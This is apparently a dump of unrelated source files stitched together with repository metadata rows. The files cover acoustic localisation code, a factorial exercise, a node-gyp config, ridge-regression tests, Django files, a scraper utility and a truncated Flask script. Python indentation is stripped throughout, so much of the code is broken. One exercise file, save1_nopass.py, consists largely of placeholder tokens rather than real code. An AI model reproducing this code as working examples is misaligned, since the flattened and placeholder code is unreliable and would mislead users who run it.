A two-element list containing the x and y coordinates
"""
# The cross-correlation takes O(n) time, where n is the length of the signals
# These loops take O(N^2) time, where N is the number of signals
# For constant N, then, increasing the signal size linearly increases the
# running time
#
# - Calculate the lag matrix (skip auto correlations since they aren't used)
lag_matrix = np.zeros((len(signals), len(signals), len(signals[0])*2-1))
for i,signal_i in enumerate(signals):
for j,signal_j in enumerate(signals[i+1:]):
lag_matrix[i, j+i+1] = sig.correlate(signal_i, signal_j)
lag_matrix[j+i+1, i] = lag_matrix[i, j+i+1]
quadrant = -1
if octant >=0:
quadrant = int(octant / 2)
# - Create a zero matrix the size of the test point grid (sum matrix)
sums = np.zeros((grid_size, grid_size))
if quadrant >= 0:
if (quadrant == 0) or (quadrant == 3):
xs = np.linspace(0, radius, num=grid_size)
else:
xs = np.linspace(0, -radius, num=grid_size)
if (quadrant == 0) or (quadrant == 1):
ys = np.linspace(0, radius, num=grid_size)
else:
ys = np.linspace(0, -radius, num=grid_size)
else:
xs = np.linspace(-radius, radius, num=grid_size)
ys = np.linspace(-radius, radius, num=grid_size)
n0 = len(signals[0])
ijs = []
for i,signal_i in enumerate(signals):
for j,signal_j in enumerate(signals[i+1:]):
# Note: j -> j+i+1 because of the loop optimization
ijs.append([i, j+i+1])
ijs = np.array(ijs)
if np.any(octant == np.array([0,1,4,5])):
# octants 0,1,4,5
constraint_slope = float(mic_coordinates[0,0]) / mic_coordinates[0,1]
else:
# octants 2,3,6,7
constraint_slope = float(mic_coordinates[1,0]) / mic_coordinates[1,1]
"""
print 'Constraint Slope:', constraint_slope
print 'Quadrant:', quadrant
print 'xs:', xs
print 'ys:', ys
"""
# The math in the inner loop takes O(1) time
# The inner two loops take O(N^2) time
# The outer two loops take O(M^2) time if we assume equal sized horizontal
# and vertical grids with M rows and columns
# Together this is O(M^2*N^2) time
#
# - For each test point...
#print 'xs = {%.2f, %.2f}' % (xs[0], xs[-1])
for a,x in enumerate(xs):
if (quadrant >= 0):
max_y = math.sqrt(radius**2 - x**2)
dy = radius / (grid_size-1)
max_b = int(round(max_y / dy))
else:
min_b = 0
max_b = len(ys)
#print 'ys = {%.2f, %.2f}' % (ys[0], ys[max_b-1])
for b,y in enumerate(ys[:max_b]):
#for b,y in enumerate(ys):
# - For each pair of microphones...
for index,ij in enumerate(ijs):
contrib_index = -1
if (x**2 + y**2) <= (radius**2) and\
((octant == 0 and y <= constraint_slope*x and x >= y/constraint_slope) or\
(octant == 1 and y >= constraint_slope*x and x <= y/constraint_slope) or\
(octant == 2 and y >= constraint_slope*x and x >= y/constraint_slope) or\
(octant == 3 and y <= constraint_slope*x and x <= y/constraint_slope) or\
(octant == 4 and y >= constraint_slope*x and x <= y/constraint_slope) or\
(octant == 5 and y <= constraint_slope*x and x >= y/constraint_slope) or\
(octant == 6 and y <= constraint_slope*x and x <= y/constraint_slope) or\
(octant == 7 and y >= constraint_slope*x and x >= y/constraint_slope) or\
(octant < 0)):
#print 'r=', x**2 + y**2
contrib_index = ac_contrib_index(mic_coordinates, [x, y], thickness,
ij[0], ij[1], n0, v_s, v_p, dt,
settling_time)
if contrib_index >= 0 and contrib_index < lag_matrix.shape[2]:
sums[a,b] += lag_matrix[ij[0],ij[1],contrib_index]
# - Use the max sum matrix element to calculate the most likely source point
max_indicies = np.unravel_index([np.argmax(sums)], np.shape(sums))
coordinates = [xs[max_indicies[0][0]], ys[max_indicies[1][0]]]
if coordinates[0]**2 + coordinates[1]**2 > radius**2:
coordinates = [0.0,0.0]
return coordinates
def peaks(xs, ys):
derivative = np.gradient(ys)
#print derivative
last_deriv = 0.0
indicies = []
for index, deriv in enumerate(derivative):
if ((last_deriv >= 0.0) and (deriv < 0.0)):
if ((index > 0) and (ys[index-1] > ys[index])):
indicies.append(index-1)
else:
indicies.append(index)
last_deriv = deriv
ysxs = zip(map((lambda i: xs[i]), indicies), map((lambda i: ys[i]), indicies))
sorted_ysxs = sorted(ysxs, key=lambda elem: elem[1], reverse=True)
return map((lambda elem: elem[0]), sorted_ysxs)
def spectra(times, signals, padlen=0):
dt = times[1] - times[0]
if padlen > 0:
signal_padding = np.zeros((np.shape(signals)[0], padlen))
signals = np.hstack((signal_padding, signals, signal_padding))
time_padding = np.arange(times[-1]+dt, times[-1]+dt+padlen*dt, dt)
times = np.hstack((times, time_padding))
spectrum_length = round(np.shape(signals)[1]/2)
frequencies = np.zeros((spectrum_length))
magnitudes = np.zeros((np.shape(signals)[0], spectrum_length))
phases = np.zeros((np.shape(signals)[0], spectrum_length))
for index,signal in enumerate(signals):
frequency_spectrum = np.fft.fft(signal)[:spectrum_length]
magnitudes[index] += np.sqrt( np.real(frequency_spectrum)**2 \
+ np.imag(frequency_spectrum)**2)
frequencies = np.fft.fftfreq(
frequency_spectrum.size*2, d=dt)[:spectrum_length]
phases[index] = np.arctan2(np.imag(frequency_spectrum),
np.real(frequency_spectrum))
return (frequencies, magnitudes, phases)
def ricker_center_freq(dt):
# Get the frequency spectrum of the Ricker wavelet
# with width 1 in units of samples
wavelet = sig.ricker(1e3, 1) # arbitrary num. of points, not too big or small
frequency_spectrum = np.fft.fft(wavelet)[:int(round(wavelet.size/2))]
spectrum_magnitude = np.sqrt( np.real(frequency_spectrum)**2
+ np.imag(frequency_spectrum)**2)
frequencies = np.fft.fftfreq(frequency_spectrum.size*2, d=1)\
[:int(round(wavelet.size/2))]
# Empirically, fc/fp = 1.186; where fp is the peak FFT frequency and
# fc is the desired center frequency.
# - Divide by the sample width to get units of Hz
return 1.186 * frequencies[np.argmax(spectrum_magnitude)] / dt
def translated_ricker_wavelet(times, scale, t):
wavelet = sig.ricker(len(times), scale)
dt = times[0] - times[1]
zero_index = times.size / 2
center_index = np.where(np.abs(times-t) < 1.0e-9)[0][0]
shift = center_index - zero_index
return np.roll(wavelet, shift)
| [
"muffinspawn@gmail.com"
] | muffinspawn@gmail.com |
dc5e2423730112b719beb9610822a27a84026bd3 | bde6154a8195fc0da96b5368aec75c3dc3303bce | /jaruwit-6230401856-lab3/Problem 4.py | 79301e80bd35a15dfdfb0cbc1c5b19548f21643a | [] | no_license | jaruwitteng/6230401856-oop-labs | 471c4d7123fe29245d9d9f327cb23d64f42b2317 | 59a6db567fb6ef30478d44ca5fd27f6d480f5e03 | refs/heads/master | 2023-01-14T04:08:00.789324 | 2020-11-20T15:30:51 | 2020-11-20T15:30:51 | 284,852,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | def factorial():
correct = False
while not correct:
try:
digit = int(input("Enter a number to find the factorial:"))
total = 1
for digit in range(1, digit + 1):
total *= digit
print("Factorial of", digit, "is", total)
correct = True
except ValueError:
print("Invalid")
factorial()
| [
"noreply@github.com"
] | jaruwitteng.noreply@github.com |
2f45ea90c882aa17433596c733ade360b0dfb0f0 | 6af4962b62d32c77de39e7e42f5e40c12edaeeea | /node_modules/mongodb/node_modules/bson/build/config.gypi | 4c70786e495066c21ba9e6b83ca030918d15d994 | [
"Apache-2.0"
] | permissive | BelfordZ/better | b4146519dba222138df9818ae4cfdbadec86edaf | 737f3aa84eb880c94c2c8d8e96d2230aeb1d7fa5 | refs/heads/master | 2020-04-06T07:09:28.665796 | 2013-08-01T07:19:38 | 2013-08-01T07:19:38 | 11,309,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"nodedir": "/home/action/.node-gyp/0.10.11",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"pre": "",
"sign_git_tag": "",
"always_auth": "",
"user_agent": "node/v0.10.11 linux x64",
"bin_links": "true",
"description": "true",
"fetch_retries": "2",
"init_version": "0.0.0",
"user": "26272",
"force": "",
"ignore": "",
"cache_min": "10",
"editor": "vim -f",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/action/.npmrc",
"coverage": "",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/home/action/tmp",
"userignorefile": "/home/action/.npmignore",
"yes": "",
"depth": "null",
"save_dev": "",
"usage": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/home/action/.nvm/v0.10.11",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/action/.npm",
"npaturl": "http://npat.npmjs.org/",
"searchsort": "name",
"version": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"global": "",
"link": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "true",
"node_version": "v0.10.11",
"tag": "latest",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/home/action/.nvm/v0.10.11/etc/npmrc",
"init_module": "/home/action/.npm-init.js",
"parseable": "",
"globalignorefile": "/home/action/.nvm/v0.10.11/etc/npmignore",
"cache_lock_retries": "10",
"group": "26272",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"json": ""
}
}
| [
"belfordz66@gmail.com"
] | belfordz66@gmail.com |
90631679a89c51ce0644b32bbe8d7946814c023f | e9b603b427004e745c864a0557f146e91eb5cd8d | /tests/test_ridge.py | c066f48fe0ef8d58aa4b19024e03a53d9943e528 | [] | no_license | dakloepfer/AIMS-Optimization-Labs | 7f38eb4ad68e7b5ae64b78530344bbf733cca99d | 12291ad0864d807319edc9acbbaa7d85d4fb7f63 | refs/heads/master | 2023-01-06T22:58:45.031909 | 2020-11-01T23:54:36 | 2020-11-01T23:54:36 | 307,413,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,010 | py | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
np.random.seed(1234)
torch.manual_seed(1234)
n_features = 3
n_samples = 5
mu = 0.02
cls.hparams = Container(n_features=n_features,
n_samples=n_samples,
mu=mu)
cls.w = torch.randn(n_features, 1, requires_grad=True)
cls.x = torch.randn(n_samples, n_features)
cls.y = torch.randn(n_samples)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_ClosedForm(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_Gradient(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
if __name__ == '__main__':
unittest.main(argv=argv)
| [
"dominikkloepfer@dhcp-90.wolf.ox.ac.uk"
] | dominikkloepfer@dhcp-90.wolf.ox.ac.uk |
0df083b0ca211010f1b8aea908d87a5d511217b2 | 71f55ebd4ba04997fb393704927098fb3071a1f9 | /test/__init__.py | 1a474a2e7a92bb9cda661a8da773b2c889a4fe8e | [] | no_license | dattatembare/ngo-data | ba1e82dbb9347dc08aa5849c871b6f5df3a8baa5 | 9b833ab28e3a4db3a0caf7a71f253ce7453bc41d | refs/heads/master | 2022-12-16T16:31:23.435449 | 2020-12-24T16:02:53 | 2020-12-24T16:02:53 | 246,443,022 | 1 | 0 | null | 2022-12-08T06:19:22 | 2020-03-11T01:07:09 | Python | UTF-8 | Python | false | false | 222 | py | import os
import sys
# This path setup is very important when you have src and test under main directory
current_dir = os.path.dirname(__file__)
sys.path.insert(0, current_dir)
sys.path.insert(0, current_dir + '/../src')
| [
"dtembare@solutechnology.com"
] | dtembare@solutechnology.com |
a95fa81f5efdfcd29c79fad33a30a88eff514425 | e243a941f5564008f68306ca32af3deffb427ba7 | /assignment1/.env/bin/ipython | 84d11e9477b05da76b01ebd9e2a7641b67aa0e71 | [] | no_license | jingxia/NLP_DL | c7a25e5914a974acccf750e9ef4bb90d81f77423 | e0288103373b781e0fdaab3f938fe27daff688ea | refs/heads/master | 2021-01-01T03:48:15.118733 | 2016-05-14T22:30:59 | 2016-05-14T22:30:59 | 58,833,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | #!/Users/jing/PycharmProjects/NLP_DL/assignment1/.env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython import start_ipython
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(start_ipython())
| [
"jingxia615@gmail.com"
] | jingxia615@gmail.com | |
1cdc7ec466731235e82f795288e717540ca4a629 | 64fe3e798b8cb6a34314f5044606a8d102828f43 | /hackhaton/hackhaton/wsgi.py | 3dc9a18c54f846d2f9f3ce5d098fe83498b614f4 | [] | no_license | jlga94/hackhaton_django | 821a375042dd1846d8fa38cdbc59f235d6a1bdc7 | 197dc2dd00a8a1ebcf4abe7502245de103b0abb2 | refs/heads/master | 2021-09-05T17:07:09.261417 | 2018-01-29T21:51:48 | 2018-01-29T21:51:48 | 114,500,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
WSGI config for hackhaton project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hackhaton.settings")
application = get_wsgi_application()
| [
"jose.gil@pucp.pe"
] | jose.gil@pucp.pe |
6e8da8e397cef33da10c132cc14befac799d08b6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/030_movie_data_analysis/save1_nopass.py | de9624e5838b09cfbf6dd63a838b4df2ba2feb25 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,495 | py | # _______ c__
# ____ c.. _______ d.., n..
# _______ __
# ____ u__.r.. _______ u..
#
# BASE_URL 'https://bites-data.s3.us-east-2.amazonaws.com/'
# TMP '/tmp'
#
# fname 'movie_metadata.csv'
# remote __.p...j.. B.. f..
# local __.p...j.. T.. f..
# u.. ? ?
#
# MOVIE_DATA local
# MIN_MOVIES 4
# MIN_YEAR 1960
#
# Movie n.. 'Movie', 'title year score'
#
#
# ___ get_movies_by_director
# """Extracts all movies from csv and stores them in a dict,
# where keys are directors, and values are a list of movies,
# use the defined Movie namedtuple"""
#
# d d.. l..
# full_list # list
#
# w__ o.. M.. newline='' __ file
# reader c__.D.. ?
# ___ row __ ?
# year ? 'title_year'
# __ ? !_ '' a.. i.. ? > 1960
# f__.a.. ? 'director_name' ? 'movie_title' .s.. i.. ? 'title_year' f__ ? 'imdb_score'
#
# ___ name, movie, year, score __ f..
# d name .a.. ? t.._m.. y.._y.. s.._s..
#
# r.. ?
#
#
# ___ calc_mean_score movies
# """Helper method to calculate mean of list of Movie namedtuples,
# round the mean to 1 decimal place"""
# scores movie.s.. ___ ? __ ?
# r.. r.. s.. ? / l.. ? 1
#
# ___ get_average_scores directors
# """Iterate through the directors dict (returned by get_movies_by_director),
# return a list of tuples (director, average_score) ordered by highest
# score in descending order. Only take directors into account
# with >= MIN_MOVIES"""
#
# p..
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
296ac53495121ded2eaac5581cfbda578198a783 | 04da06b04f9e3b2718aa63c9bf6eebc849978ba4 | /scripts/2018-2019/2018 AY papers/misc/randomdebug.py | 1deeb3285f46ce12737cee05ed837ffd1962f6e9 | [
"Apache-2.0"
] | permissive | seccode/havsim | 791434b724a3c4e70ad2300b95bf4efa9311c415 | 0aaf9674e987822ff2dc90c74613d5e68e8ef0ce | refs/heads/master | 2023-03-13T01:01:46.204165 | 2021-02-24T06:26:03 | 2021-02-24T06:26:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,782 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 31 16:03:45 2018
@author: rlk268
"""
from calibration import *
##out,out2 = r_constant(rinfo[0],platooninfo[562][1:3],platooninfo[562][3],45)
#
##leadinfo,folinfo,rinfo = makeleadfolinfo_r5(curplatoon,platooninfo,sim)
#sim = copy.deepcopy(meas)
#platoons = [[],1013]
#
#pguess = [20,1,8,3.3,12]
#leadinfo,folinfo,rinfo = makeleadfolinfo(platoons, platooninfo, meas)
##platoonobjfn_objder(p,*(OVM, OVMadjsys, OVMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,6))
#
#blah = platoonobjfn_objder(test,*(IDM, IDMadjsys, IDMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo))
#print(blah)
#%%
#sim = copy.deepcopy(meas)
#platoons = [[],1013]
#
#pguess = [0,60,5]
#leadinfo,folinfo,rinfo = makeleadfolinfo_r3(platoons, platooninfo, meas)
##platoonobjfn_objder(p,*(OVM, OVMadjsys, OVMadj, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,6))
#
#blah = TTobjfn_obj(pguess,*(None, None, None, meas, sim, platooninfo, platoons, leadinfo, folinfo,rinfo,True,3))
#%% make sure newell works with the calibrate_bfgs function
#from calibration import *
#platoonlist = [[[],969]]
#
#plist = [[1.5,60,5],[2.5,100,60],[2,150,60]]
#mybounds = [(0,5),(5,200),(.1,75)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo_r3,TTobjfn_obj,TTobjfn_fder,None,None,None,True,3,cutoff = 0,delay = True,dim=1)
#from calibration import *
#platoonlist = [[[],603]]
#
#plist = [[1.5,60,5,5],[2.5,100,60,60],[2,150,60,60]]
#mybounds = [(0,5),(5,200),(.1,75),(.1,75)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo_r3,TTobjfn_obj,TTobjfn_fder,None,None,None,True,4,True,cutoff = 0,delay = True,dim=1)
#%%
#from calibration import *
#
#platoonlist = [[[],603]]
#plist = [[40,1,1,3,10],[60,1,1,3,10],[80,1,15,1,1]]
##plist = [[40,1,1,3,10,25],[60,1,1,3,10,5],[80,1,15,1,1,5]]
##plist = [[40,1,1,3,10,25,25],[60,1,1,3,10,5,5],[80,1,15,1,1,5,5]]
#mybounds = [(20,120),(.1,5),(.1,35),(.1,20),(.1,20)]
#
#test = calibrate_bfgs(plist,mybounds,meas,platooninfo,platoonlist,makeleadfolinfo,platoonobjfn_objder,None,IDM_b3,IDMadjsys_b3,IDMadj_b3,False,5,cutoff = 0,delay = False,dim=2)
#%%
#need to be a little bit careful with plotting when the linesearch fails because of the time delay.
#with open('LCtest5.pkl','rb') as f:
# merge_nor, merge_r, merge_2r,mergeLC_r, mergeLC_2r = pickle.load(f)
#sim = copy.deepcopy(meas)
#obj = TTobjfn_obj(bfgs[0],*(None, None, None, meas, sim, platooninfo, curplatoon, leadinfo, folinfo,rinfo,True,4,True,True))
#re_diff(sim,platooninfo,curplatoon,delay = bfgs[0][0])
#%%
#SEobj_pervehicle(meas,sim,platooninfo,curplatoon)
from calibration import *
meas2,followerchain = makefollowerchain(956,data,15)
| [
"rlk268@cornell.edu"
] | rlk268@cornell.edu |
f6781a69e1b2ae0d198cc5c11ac27d5d185fa49e | c3cc755ae500e87b6d5fa839efaa4d7d0f746d43 | /Part 1/Ch.6 Dictionaries/Nesting/pizza.py | f07401d2bb54c94f78013b95d7f88cd48287e6fd | [] | no_license | AngryGrizzlyBear/PythonCrashCourseRedux | 9393e692cdc8e5e28a66077bbc6c1e674642d209 | 28d48fa16fc238cf0409f6e987a3b4b72e956a92 | refs/heads/master | 2020-03-28T11:04:44.030307 | 2018-10-20T21:06:27 | 2018-10-20T21:06:27 | 148,175,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | # Store information about a pizza being ordered.
pizza = {
'crust': 'thick',
'toppings': ['mushrooms', 'extra cheese'],
}
# Summarized the order
print("You ordered a " + pizza['crust'] + "-crust pizza " +
"with the following toppings:")
for topping in pizza['toppings']:
print("\t" + topping) | [
"evanmlongwood@gmail.com"
] | evanmlongwood@gmail.com |
dd72b8bc7f5980ef8d3cb54b0675f06925816d22 | 8ca34426e2260877d2085c7b39ffe8bca935849a | /Practica 5/Ejercicio 4.py | f9bd1abf24bea0fe60395aed16369bf32c1d375e | [] | no_license | RDAW1/Programacion | 14f12d9d2f11ecc83cf0d4194152564da0655034 | 2dc48538e70faa611e2616ff9953117325e680b8 | refs/heads/master | 2021-08-14T20:10:41.540800 | 2017-11-16T17:19:47 | 2017-11-16T17:19:47 | 107,440,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | print 'Escribe un numero'
a=input()
li=[a]
print 'Escribe otro numero mayor que' ,(a)
b=input()
while b<=a:
print (b), 'no es mayor que' ,(a)
b=input()
li=li+[b]
print 'Los numeros que has escrito son' ,(li)
| [
"noreply@github.com"
] | RDAW1.noreply@github.com |
4f7d5a85a420de08e9bf9fc111057990ab60620f | 445b3c4e1b9a79d438f141a227b8f235d5b172e5 | /day11_装饰器/demo_03_最简单的装饰器.py | 4b4463e99486e4f6dab6995705297c2616bc92f7 | [] | no_license | fengzongming/python_practice | d835b1164041ac68e6cd8cb6cd8c370033da84fa | 82d0449e46c41798d2361c37ed47f028a956439e | refs/heads/master | 2020-04-09T19:42:18.076487 | 2019-01-17T17:36:14 | 2019-01-17T17:36:14 | 160,551,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | """
装饰器类型:
1. 最简单的装饰器
2. 有返回值的装饰器
3. 有一个参数的装饰器
4. 万能参数的装饰器
装饰器作用:
在不修改函数源码的情况下, 给函数增加功能
语法糖: @
"""
import time
def timmer(f):
def inner():
start_time = time.time()
f()
end_time = time.time()
print("函数执行时间为:", end_time - start_time)
return inner
@timmer
def func():
time.sleep(0.01)
print("hello 装饰器")
# func = timmer(func)
func()
| [
"956626817@qq.com"
] | 956626817@qq.com |
c7a5b452be9c4a1b287984eeb33a1fc8a65faa85 | a8901bc908624f154883f4d3da224ab6ef2ad3f3 | /utils.py | 647bc6ccbe76000defbd2a3e3601e1977abf8482 | [] | no_license | hieuddo/ml-project | a7213c6cdfa1e36e877ed275da381ac330e49ebf | 05e4062ce5f0db3c7db4d861cbffbb119470b005 | refs/heads/master | 2022-11-17T11:50:01.188976 | 2020-07-12T06:25:44 | 2020-07-12T06:25:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py | import os
import pandas as pd
def set_start_url(url):
with open('scraper-draft.py', 'r') as inFile, open('scraper.py', 'w') as outFile:
lines = inFile.readlines()
for idx, line in enumerate(lines):
if idx != 5:
outFile.write(line)
else:
line = line[:-2] + f"'{url}'" + line[-2:]
outFile.write(line)
def run_spider(out_file='out.json'):
if os.path.exists(out_file):
os.remove(out_file)
try:
os.system(f'scrapy runspider -o {out_file} scraper.py')
except:
pass
def predict_posts(cls, file='out.json'):
df = pd.read_json(file)
cnt = 0
out_df = pd.DataFrame(columns=['User', 'Post URL', 'Content', 'Is hate speech?', 'Ignore User'])
for idx in range(1, df.shape[0]):
line = df.iloc[idx]
y_pred = cls.predict(line.text)[1].cpu().numpy()
if y_pred != 0:
if y_pred == 1:
pred_text = 'Offensive Language'
else: # y_pred == 2
pred_text = 'Hate speech'
out_df.loc[cnt] = [line.user, line.link, line.text, pred_text, line.ignore]
cnt += 1
return out_df | [
"hieu.dd.1998@gmail.com"
] | hieu.dd.1998@gmail.com |
56a437554e13be743bb4c7518a134f99721129e8 | 468a5b0be968b4d0ebd66ffbdcdc0b61279286b3 | /tags/migrations/0001_initial.py | 053815b2bc3a416fecdfb6e8cd209b0138bff80c | [] | no_license | ARHAM30/Ecommerce-django | 85cd4385c0aa95284b9051b3fbdee074a828cfc8 | 2131dae4452dbeea3345fffd0f63a14ba62bc15b | refs/heads/master | 2020-08-17T17:47:01.588922 | 2020-01-22T03:09:32 | 2020-01-22T03:09:32 | 215,693,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | # Generated by Django 2.2.4 on 2019-10-23 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('product', '0004_auto_20191023_1635'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('slug', models.SlugField()),
('timestamp', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('products', models.ManyToManyField(blank=True, to='product.Product')),
],
),
]
| [
"arhambaig977@gmail.com"
] | arhambaig977@gmail.com |
5a7f707773146c6ee40d27fc4da4971ee2f9ea24 | fbfd842136ce51a598801d1db8a383633f6ef65b | /CP/Competetive Programming And DSA/hwiPolice.py | a27aab90cb9b4e208ca0e3b1b7c591d30b85a251 | [] | no_license | jayz25/MiniProjects-And-CP | 6d74fd1b58d10036235520a1d10d928f45d5d542 | 40eb2f0f3449e77e02424fcc8fa80597f2a83bf6 | refs/heads/master | 2023-06-11T03:04:50.348564 | 2021-06-20T18:42:55 | 2021-06-20T18:42:55 | 366,385,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | n = int(input())
k = int(input())
arr = [0,1,0,0,1,0]
stack = []
i = 0
while(i<n):
if arr[i]==0:
stack.append(i+1)
print(stack)
i += 1
else:
for _ in range(k):
try:
stack.pop()
except IndexError:
pass
print("for",stack)
stack.append(i+1)
i = i + 1
print(sum(stack))
| [
"patiljayesh026@gmail.com"
] | patiljayesh026@gmail.com |
bdd426918d251d7936aa6a4edb1a186df0ccf340 | a090c4acc00adab3efc1825bf281dd8e82e3e69f | /pixelate/mosaic_style/abstract_mosaic_style.py | 40e3710884dc85bc82c3a51f274880e7a34ad00a | [] | no_license | huhudev-git/tus-image-project | c3da1d9b42b0c5816377c2cab286a0424324215d | 55c4b4a09bd7dfbff95a4f999649b14f69738ccf | refs/heads/main | 2023-03-28T11:49:52.230660 | 2021-03-31T08:40:04 | 2021-03-31T08:40:04 | 315,810,774 | 0 | 0 | null | 2021-03-31T08:41:41 | 2020-11-25T02:48:05 | JavaScript | UTF-8 | Python | false | false | 205 | py | import abc
class AbstructMosaicStyle(abc.ABC):
"""モザイクパターンのスタイルパラメータ
"""
@abc.abstractclassmethod
def from_json(cls, json_data):
return cls()
| [
"contact@huhu.dev"
] | contact@huhu.dev |
5a92d4ab1cc807439b41619bcfda92f6a5fe48e4 | 3d0f970843c75e9885d3ce3e72cf4b12e9c2cc06 | /googleform/migrations/0009_auto_20200624_1840.py | e851beb3c287ff0b0b52657b4ec3066733bea6a5 | [] | no_license | shantanuatgit/applicationform | 69556dc3b89cf602dfc074c5a33f07983d94f615 | 3e2ca8200f5bd695342906e7622b64955130173a | refs/heads/master | 2022-11-18T06:19:12.155255 | 2020-07-20T04:21:29 | 2020-07-20T04:21:29 | 281,011,154 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | # Generated by Django 2.0.2 on 2020-06-24 13:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('googleform', '0008_auto_20200621_2049'),
]
operations = [
migrations.AlterField(
model_name='cvmodel',
name='file1',
field=models.FileField(upload_to='uploads/'),
),
]
| [
"shantanu3250@.com"
] | shantanu3250@.com |
f233566bc0209e6c8a219974fc105d441148d00f | d4fa412e7628f18b66f3c26588c68ec346356bb3 | /main.py | 2de819593c913d9fb0764c2f3b27904980e6ae13 | [] | no_license | MohammadNazier/Flask-Thermometer-reader | 43251a80f1812973492f3404f8d9c1ba5166427c | cb346af70adac2e4eb57721c15abea54bb0aaca5 | refs/heads/main | 2023-08-28T22:38:05.718539 | 2021-11-01T15:17:15 | 2021-11-01T15:17:15 | 421,877,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py |
from flask import Flask #need to install
